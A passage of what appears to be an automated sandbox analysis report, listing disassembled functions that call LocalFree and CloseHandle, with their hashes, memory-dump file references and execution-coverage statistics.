                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$FreeLocal
                                                                            • String ID:
                                                                            • API String ID: 2513001865-0
                                                                            • Opcode ID: 2fedb1619d8d00bb4cc7a18a1119d5d7ce9065acb6467173064a1283124ecfa1
                                                                            • Instruction ID: a0e6d0d32426c319febc2d76b944b92adf305f7e7689c126071d4da8809d89f3
                                                                            • Opcode Fuzzy Hash: 2fedb1619d8d00bb4cc7a18a1119d5d7ce9065acb6467173064a1283124ecfa1
                                                                            • Instruction Fuzzy Hash: 2EF0ED7A504300CBD7248F65F99C7A97BB5B788306F40891AE651833B0EB7D9C45DF1A
                                                                            Function 007DB6B7 Relevance: 5.0, APIs: 4, Instructions: 30COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DB928
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DB93D
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DB95D
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DB97D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$FreeLocal
                                                                            • String ID:
                                                                            • API String ID: 2513001865-0
                                                                            • Opcode ID: 112ba1709935c093586dfbca4190ce575b0b510c462851b4168415d56ffd2e22
                                                                            • Instruction ID: a0e6d0d32426c319febc2d76b944b92adf305f7e7689c126071d4da8809d89f3
                                                                            • Opcode Fuzzy Hash: 112ba1709935c093586dfbca4190ce575b0b510c462851b4168415d56ffd2e22
                                                                            • Instruction Fuzzy Hash: 2EF0ED7A504300CBD7248F65F99C7A97BB5B788306F40891AE651833B0EB7D9C45DF1A
                                                                            Function 007DB691 Relevance: 5.0, APIs: 4, Instructions: 30COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DB928
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DB93D
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DB95D
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DB97D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$FreeLocal
                                                                            • String ID:
                                                                            • API String ID: 2513001865-0
                                                                            • Opcode ID: 43ce3372ce40c81838ed99e1ba9a64d970a8b1daaf7116df588e90ca41ec0c07
                                                                            • Instruction ID: a0e6d0d32426c319febc2d76b944b92adf305f7e7689c126071d4da8809d89f3
                                                                            • Opcode Fuzzy Hash: 43ce3372ce40c81838ed99e1ba9a64d970a8b1daaf7116df588e90ca41ec0c07
                                                                            • Instruction Fuzzy Hash: 2EF0ED7A504300CBD7248F65F99C7A97BB5B788306F40891AE651833B0EB7D9C45DF1A
                                                                            Function 007DA0A4 Relevance: 5.0, APIs: 4, Instructions: 27COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DA140
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DA14A
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DA156
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DA160
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeLocal$CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2045616094-0
                                                                            • Opcode ID: c0bc630278bfb44363c3b26884e823321708b2214cab602f07e7d18dc910a7e2
                                                                            • Instruction ID: 05e2b3e32781f1395a2035d14edd967490831cb01c74b922307753028d1c0aaa
                                                                            • Opcode Fuzzy Hash: c0bc630278bfb44363c3b26884e823321708b2214cab602f07e7d18dc910a7e2
                                                                            • Instruction Fuzzy Hash: 94F067B9A00218DFCB14DFF4ED8895EBB79BF89311F104A54B946AB314CA359940DF21
                                                                            Function 007C5169 Relevance: 5.0, APIs: 4, Instructions: 25COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C56DD
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C56F2
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C5702
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C5712
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseFreeHandleLocal
                                                                            • String ID:
                                                                            • API String ID: 836400252-0
                                                                            • Opcode ID: 0d769211def397f3ec687323cbd790fbc663fbc8b3409a1ee9723e69f038d17b
                                                                            • Instruction ID: 6bb361f14ddffa44d0d7d83f180eb9acc520a5045b931e1bc1ab261faa6091e6
                                                                            • Opcode Fuzzy Hash: 0d769211def397f3ec687323cbd790fbc663fbc8b3409a1ee9723e69f038d17b
                                                                            • Instruction Fuzzy Hash: 7AF0F835901504DBD7148BA4EC4DF6ABBB5BBC4701F848D2CE101B65A0C779A8C0CF50
                                                                            Function 007C53E7 Relevance: 5.0, APIs: 4, Instructions: 25COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C56DD
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C56F2
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C5702
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C5712
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseFreeHandleLocal
                                                                            • String ID:
                                                                            • API String ID: 836400252-0
                                                                            • Opcode ID: b629f6e0c4872d05758b8ebbc59787866df275030e91d5ea7518e554fc846bea
                                                                            • Instruction ID: 6bb361f14ddffa44d0d7d83f180eb9acc520a5045b931e1bc1ab261faa6091e6
                                                                            • Opcode Fuzzy Hash: b629f6e0c4872d05758b8ebbc59787866df275030e91d5ea7518e554fc846bea
                                                                            • Instruction Fuzzy Hash: 7AF0F835901504DBD7148BA4EC4DF6ABBB5BBC4701F848D2CE101B65A0C779A8C0CF50
                                                                            Function 007C53CA Relevance: 5.0, APIs: 4, Instructions: 25COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C56DD
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C56F2
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C5702
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C5712
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseFreeHandleLocal
                                                                            • String ID:
                                                                            • API String ID: 836400252-0
                                                                            • Opcode ID: dbb9ebb9385cb75b267210b513ec2e4ac33cee73448c97feb1498ed53892ab43
                                                                            • Instruction ID: 6bb361f14ddffa44d0d7d83f180eb9acc520a5045b931e1bc1ab261faa6091e6
                                                                            • Opcode Fuzzy Hash: dbb9ebb9385cb75b267210b513ec2e4ac33cee73448c97feb1498ed53892ab43
                                                                            • Instruction Fuzzy Hash: 7AF0F835901504DBD7148BA4EC4DF6ABBB5BBC4701F848D2CE101B65A0C779A8C0CF50
                                                                            Function 007C549F Relevance: 5.0, APIs: 4, Instructions: 25COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C56DD
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C56F2
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C5702
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C5712
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseFreeHandleLocal
                                                                            • String ID:
                                                                            • API String ID: 836400252-0
                                                                            • Opcode ID: d99d72bbdbd1a6c202a60f3e06c9ff4ca5c41cbe7eff3069d494279afbb5c1f7
                                                                            • Instruction ID: 6bb361f14ddffa44d0d7d83f180eb9acc520a5045b931e1bc1ab261faa6091e6
                                                                            • Opcode Fuzzy Hash: d99d72bbdbd1a6c202a60f3e06c9ff4ca5c41cbe7eff3069d494279afbb5c1f7
                                                                            • Instruction Fuzzy Hash: 7AF0F835901504DBD7148BA4EC4DF6ABBB5BBC4701F848D2CE101B65A0C779A8C0CF50
                                                                            Function 007C5544 Relevance: 5.0, APIs: 4, Instructions: 25COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C56DD
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C56F2
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C5702
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C5712
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseFreeHandleLocal
                                                                            • String ID:
                                                                            • API String ID: 836400252-0
                                                                            • Opcode ID: acfc30a595d0c6c82b629928c7c7a5afc1616c7ea5efca8e5bb25cc82afb785c
                                                                            • Instruction ID: 6bb361f14ddffa44d0d7d83f180eb9acc520a5045b931e1bc1ab261faa6091e6
                                                                            • Opcode Fuzzy Hash: acfc30a595d0c6c82b629928c7c7a5afc1616c7ea5efca8e5bb25cc82afb785c
                                                                            • Instruction Fuzzy Hash: 7AF0F835901504DBD7148BA4EC4DF6ABBB5BBC4701F848D2CE101B65A0C779A8C0CF50
                                                                            Function 007C55C5 Relevance: 5.0, APIs: 4, Instructions: 25COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C56DD
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C56F2
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C5702
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C5712
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseFreeHandleLocal
                                                                            • String ID:
                                                                            • API String ID: 836400252-0
                                                                            • Opcode ID: f4f092a12180f03273565b925e7259407fb646c8154647fdc4f0b1db42820dbf
                                                                            • Instruction ID: 6bb361f14ddffa44d0d7d83f180eb9acc520a5045b931e1bc1ab261faa6091e6
                                                                            • Opcode Fuzzy Hash: f4f092a12180f03273565b925e7259407fb646c8154647fdc4f0b1db42820dbf
                                                                            • Instruction Fuzzy Hash: 7AF0F835901504DBD7148BA4EC4DF6ABBB5BBC4701F848D2CE101B65A0C779A8C0CF50
                                                                            Function 007C5673 Relevance: 5.0, APIs: 4, Instructions: 25COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C56DD
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C56F2
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C5702
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C5712
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseFreeHandleLocal
                                                                            • String ID:
                                                                            • API String ID: 836400252-0
                                                                            • Opcode ID: 1a8946de11445935ea63eaabc6e056f2bd847ccc988e784513ea85004bdbce15
                                                                            • Instruction ID: 6bb361f14ddffa44d0d7d83f180eb9acc520a5045b931e1bc1ab261faa6091e6
                                                                            • Opcode Fuzzy Hash: 1a8946de11445935ea63eaabc6e056f2bd847ccc988e784513ea85004bdbce15
                                                                            • Instruction Fuzzy Hash: 7AF0F835901504DBD7148BA4EC4DF6ABBB5BBC4701F848D2CE101B65A0C779A8C0CF50
                                                                            Function 007C564C Relevance: 5.0, APIs: 4, Instructions: 25COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C56DD
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C56F2
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C5702
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C5712
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseFreeHandleLocal
                                                                            • String ID:
                                                                            • API String ID: 836400252-0
                                                                            • Opcode ID: 55cd75594e6b85e7379b23ad3d0ee57b8c1ae8d359bb54a2b595eb00efd99fb3
                                                                            • Instruction ID: 6bb361f14ddffa44d0d7d83f180eb9acc520a5045b931e1bc1ab261faa6091e6
                                                                            • Opcode Fuzzy Hash: 55cd75594e6b85e7379b23ad3d0ee57b8c1ae8d359bb54a2b595eb00efd99fb3
                                                                            • Instruction Fuzzy Hash: 7AF0F835901504DBD7148BA4EC4DF6ABBB5BBC4701F848D2CE101B65A0C779A8C0CF50
                                                                            Function 007C5630 Relevance: 5.0, APIs: 4, Instructions: 25COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C56DD
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C56F2
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C5702
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C5712
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseFreeHandleLocal
                                                                            • String ID:
                                                                            • API String ID: 836400252-0
                                                                            • Opcode ID: a1c46e657230a21ce4d3777e94104d4b49b6525eefdcab40f8175a789aa5d5a7
                                                                            • Instruction ID: 6bb361f14ddffa44d0d7d83f180eb9acc520a5045b931e1bc1ab261faa6091e6
                                                                            • Opcode Fuzzy Hash: a1c46e657230a21ce4d3777e94104d4b49b6525eefdcab40f8175a789aa5d5a7
                                                                            • Instruction Fuzzy Hash: 7AF0F835901504DBD7148BA4EC4DF6ABBB5BBC4701F848D2CE101B65A0C779A8C0CF50
                                                                            Function 007C5611 Relevance: 5.0, APIs: 4, Instructions: 25COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C56DD
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C56F2
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C5702
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C5712
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseFreeHandleLocal
                                                                            • String ID:
                                                                            • API String ID: 836400252-0
                                                                            • Opcode ID: ab94a09881a885e5e33cd19bfb2134984321c6d08c569d29b30434245b6991e7
                                                                            • Instruction ID: 6bb361f14ddffa44d0d7d83f180eb9acc520a5045b931e1bc1ab261faa6091e6
                                                                            • Opcode Fuzzy Hash: ab94a09881a885e5e33cd19bfb2134984321c6d08c569d29b30434245b6991e7
                                                                            • Instruction Fuzzy Hash: 7AF0F835901504DBD7148BA4EC4DF6ABBB5BBC4701F848D2CE101B65A0C779A8C0CF50

                                                                            Execution Graph

                                                                            Execution Coverage:11.4%
                                                                            Dynamic/Decrypted Code Coverage:99.8%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:513
                                                                            Total number of Limit Nodes:41
